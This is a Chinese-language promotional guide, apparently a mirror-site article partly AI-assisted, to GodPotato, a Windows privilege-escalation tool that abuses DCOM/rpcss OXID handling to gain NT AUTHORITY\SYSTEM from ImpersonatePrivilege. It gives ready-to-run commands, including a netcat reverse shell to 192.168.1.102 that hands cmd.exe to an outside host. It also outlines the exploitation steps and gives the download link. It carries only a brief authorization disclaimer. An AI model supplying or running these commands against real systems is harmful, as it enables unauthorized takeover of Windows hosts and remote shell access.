GodPotato:终极Windows特权提升工具入门指南
GodPotato终极Windows特权提升工具入门指南【免费下载链接】GodPotato项目地址: https://gitcode.com/gh_mirrors/go/GodPotatoGodPotato是一款基于DCOM技术的终极Windows特权提升工具能够帮助用户在Windows 2012至Windows 2022等主流操作系统上通过利用系统漏洞将低权限用户提升至NT AUTHORITY\SYSTEM权限。该工具的出现解决了传统Potato系列工具在最新Windows系统上无法运行的问题为安全测试和系统维护提供了强大支持。 什么是GodPotatoGodPotato是一款针对Windows系统的特权提升工具它基于6年的Potato特权提升技术研究从最初的RottenPotato到JuicyPotatoNG通过深入研究DCOM技术发现了新的漏洞利用方法。只要用户拥有ImpersonatePrivilege权限通常WEB服务和数据库服务都具备此权限就可以利用GodPotato将权限提升至系统最高权限。图GodPotato成功执行特权提升操作的命令行界面 支持的操作系统版本GodPotato支持以下Windows操作系统版本Windows Server 2012 - Windows Server 2022Windows 8 - Windows 11该工具利用了rpcss服务在处理oxid时的缺陷而rpcss是系统必须开启的服务因此几乎可以在任何Windows操作系统上运行。 基本使用方法简单命令执行使用程序内置的Clsid进行特权提升并执行简单命令GodPotato -cmd cmd /c whoami这条命令将执行whoami命令并返回当前用户身份。成功提升权限后将显示NT AUTHORITY\SYSTEM。自定义Clsid执行命令GodPotato还支持自定义Clsid来执行命令GodPotato -clsid {4991d34b-80a1-4291-83b6-3328366b9097} -cmd cmd /c whoami图GodPotato命令参数说明及执行结果展示执行反向shell命令除了基本命令GodPotato还可以执行反向shell命令例如GodPotato -cmd nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012 工作原理简介GodPotato的工作原理基于DCOM分布式组件对象模型技术和rpcss服务的漏洞。当系统处理oxid对象标识符时存在缺陷GodPotato利用这一缺陷通过以下步骤实现特权提升启动管道服务器创建命名管道触发RPCSS进行DCOM对象操作查找系统令牌模拟系统用户执行目标命令⚠️ 注意事项GodPotato需要在具有ImpersonatePrivilege权限的环境下运行该工具主要用于安全测试和合法的系统维护使用前请确保您拥有目标系统的合法授权在生产环境中使用时请格外谨慎 相关文件源代码文件NativeAPI/项目许可证LICENSE 致谢感谢zcgonvh和skay对本项目的贡献和支持。通过本指南您已经了解了GodPotato的基本概念、使用方法和工作原理。这款强大的Windows特权提升工具为安全研究人员和系统管理员提供了便捷的权限管理解决方案但请始终在合法授权的前提下使用。要开始使用GodPotato请先克隆仓库git clone https://gitcode.com/gh_mirrors/go/GodPotato【免费下载链接】GodPotato项目地址: https://gitcode.com/gh_mirrors/go/GodPotato创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考